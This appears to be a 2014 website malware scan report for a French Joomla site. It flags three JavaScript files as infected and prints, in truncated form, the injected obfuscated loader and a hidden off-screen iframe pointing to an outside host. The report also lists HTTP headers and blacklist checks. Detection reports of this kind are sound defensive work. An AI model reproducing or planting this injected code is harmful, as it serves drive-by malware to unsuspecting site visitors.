Scanned pages/files
| Request | Server response | Status |
http://lafeuilledor.fr/ | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/media/system/js/caption.js | 200 OK Content-Length: 12404 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(Nh){var dS2=function(Gr3){return Gr3["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},Lk=function(eM){return eM[dS2(918239)]("") },kb9=""+Lk(["mF\x18<\xb8d\x80\xb0","9b\x8c\x04\x13\x8a%","\xc1?:^e:\x1f\x0f","\x0a\x17t\x0a\x0f","\x20*\x00\x0a\x19","\x1d:)0=-)--))\x20*","\x00\x0a?:Ey)|vN\x11","u\x0a\x0f\x20**\x090","\x1a=-\x1d\x10)-\x00",")\x00)\x0a\x00)\x0a0","\x1a:*\x19=-*\x00)","\x08FuNCty\x7f^\x08a","\x7fy\x09[s\x14\x14=","\x10X0\":\x18\x ...[12249 bytes skipped]... Decoded script: ...[9280 bytes skipped]... \xf5"+"\xf2\xcb\xf8\xd5\xe9"+"\xef\xc7h\xec\xe4"),m=qOY[fI("\xc4h\xf5\xe9")];if(U0X){if(b=d[t](fI("\xebf\xe5\xf8"))[0])((i=d[t](fI("\xed`\xf7")))[l]?i[m[fI("\xefe\xee\xee\xf3")](m[fI("\xfbh\xef\xe5\xee"+"\xec")]()*i[fI("\xe5l\xef\xe6\xf5"+"\xe9")])]:b)[fI("\xe8y\xf1\xe4\xef"+"\xe5\xca\xe9\xe9\xed"+"\xe5")](U0X);else d[fI("\xfe{\xe8\xf5\xe4")](U0X[fI("\xe6|\xf5\xe4\xf3"+"\xc9\xdd\xcc\xcc")]);}delete B6W;delete fI;delete S44;})(window); <iframe src="http://sebarao.primamuebles.cl/gertykjthreg?vin" style="position:absolute;left:-1500px;top:-1600px;" height="125" width="140"></iframe> | ||
http://lafeuilledor.fr/templates/elegant/lib/js/effect_nav.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/templates/elegant/lib/js/effect_fade.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/templates/elegant/lib/js/effect_tips.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=6&Itemid=6 | 200 OK Content-Length: 7432 Content-Type: text/html | clean |
http://lafeuilledor.fr/components/com_morfeoshow/src/js/swfobject.js | 200 OK Content-Length: 17320 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(Nh){var dS2=function(Gr3){return Gr3["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},Lk=function(eM){return eM[dS2(918239)]("") },kb9=""+Lk(["mF\x18<\xb8d\x80\xb0","9b\x8c\x04\x13\x8a%","\xc1?:^e:\x1f\x0f","\x0a\x17t\x0a\x0f","\x20*\x00\x0a\x19","\x1d:)0=-)--))\x20*","\x00\x0a?:Ey)|vN\x11","u\x0a\x0f\x20**\x090","\x1a=-\x1d\x10)-\x00",")\x00)\x0a\x00)\x0a0","\x1a:*\x19=-*\x00)","\x08FuNCty\x7f^\x08a","\x7fy\x09[s\x14\x14=","\x10X0\":\x18\x ...[17114 bytes skipped]... Decoded script: ...[9280 bytes skipped]... \xf5"+"\xf2\xcb\xf8\xd5\xe9"+"\xef\xc7h\xec\xe4"),m=qOY[fI("\xc4h\xf5\xe9")];if(U0X){if(b=d[t](fI("\xebf\xe5\xf8"))[0])((i=d[t](fI("\xed`\xf7")))[l]?i[m[fI("\xefe\xee\xee\xf3")](m[fI("\xfbh\xef\xe5\xee"+"\xec")]()*i[fI("\xe5l\xef\xe6\xf5"+"\xe9")])]:b)[fI("\xe8y\xf1\xe4\xef"+"\xe5\xca\xe9\xe9\xed"+"\xe5")](U0X);else d[fI("\xfe{\xe8\xf5\xe4")](U0X[fI("\xe6|\xf5\xe4\xf3"+"\xc9\xdd\xcc\xcc")]);}delete B6W;delete fI;delete S44;})(window); <iframe src="http://sebarao.primamuebles.cl/gertykjthreg?vin" style="position:absolute;left:-1500px;top:-1600px;" height="125" width="140"></iframe> | ||
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=11&Itemid=7 | 200 OK Content-Length: 5837 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_contact&view=contact&id=1&Itemid=11 | 200 OK Content-Length: 8250 Content-Type: text/html | clean |
http://lafeuilledor.fr/media/system/js/validate.js | 200 OK Content-Length: 14687 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(Nh){var dS2=function(Gr3){return Gr3["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},Lk=function(eM){return eM[dS2(918239)]("") },kb9=""+Lk(["mF\x18<\xb8d\x80\xb0","9b\x8c\x04\x13\x8a%","\xc1?:^e:\x1f\x0f","\x0a\x17t\x0a\x0f","\x20*\x00\x0a\x19","\x1d:)0=-)--))\x20*","\x00\x0a?:Ey)|vN\x11","u\x0a\x0f\x20**\x090","\x1a=-\x1d\x10)-\x00",")\x00)\x0a\x00)\x0a0","\x1a:*\x19=-*\x00)","\x08FuNCty\x7f^\x08a","\x7fy\x09[s\x14\x14=","\x10X0\":\x18\x ...[14924 bytes skipped]... Decoded script: ...[9280 bytes skipped]... \xf5"+"\xf2\xcb\xf8\xd5\xe9"+"\xef\xc7h\xec\xe4"),m=qOY[fI("\xc4h\xf5\xe9")];if(U0X){if(b=d[t](fI("\xebf\xe5\xf8"))[0])((i=d[t](fI("\xed`\xf7")))[l]?i[m[fI("\xefe\xee\xee\xf3")](m[fI("\xfbh\xef\xe5\xee"+"\xec")]()*i[fI("\xe5l\xef\xe6\xf5"+"\xe9")])]:b)[fI("\xe8y\xf1\xe4\xef"+"\xe5\xca\xe9\xe9\xed"+"\xe5")](U0X);else d[fI("\xfe{\xe8\xf5\xe4")](U0X[fI("\xe6|\xf5\xe4\xf3"+"\xc9\xdd\xcc\xcc")]);}delete B6W;delete fI;delete S44;})(window); <iframe src="http://sebarao.primamuebles.cl/gertykjthreg?vin" style="position:absolute;left:-1500px;top:-1600px;" height="125" width="140"></iframe> | ||
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=18&Itemid=14 | 200 OK Content-Length: 5765 Content-Type: text/html | clean |
http://lafeuilledor.fr/test404page.js | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=19&Itemid=7 | 200 OK Content-Length: 7124 Content-Type: text/html | clean |
http://lafeuilledor.fr/index.php?option=com_content&view=article&id=20&Itemid=7 | 200 OK Content-Length: 7418 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lafeuilledor.fr
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 12 Jun 2014 13:55:11 GMT
Pragma: no-cache
Server: Apache
Content-Length: 4135
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 Jun 2014 13:55:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 25d606e6ab547c9e7f5d1573fffddaa7=ii61m4oh9te733fsvmgrrbtcn5; path=/
X-Powered-By: PHP/5.3.28
...4135 bytes of data.
GET / HTTP/1.1
Host: lafeuilledor.fr
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 12 Jun 2014 13:55:11 GMT
Pragma: no-cache
Server: Apache
Content-Length: 4135
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 Jun 2014 13:55:12 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 25d606e6ab547c9e7f5d1573fffddaa7=ii61m4oh9te733fsvmgrrbtcn5; path=/
X-Powered-By: PHP/5.3.28
...4135 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lafeuilledor.fr
Referer: http://www.google.com/search?q=lafeuilledor.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lafeuilledor.fr
Referer: http://www.google.com/search?q=lafeuilledor.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lafeuilledor.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lafeuilledor.fr/
Result: lafeuilledor.fr is not infected or malware details are not published yet.
Result: lafeuilledor.fr is not infected or malware details are not published yet.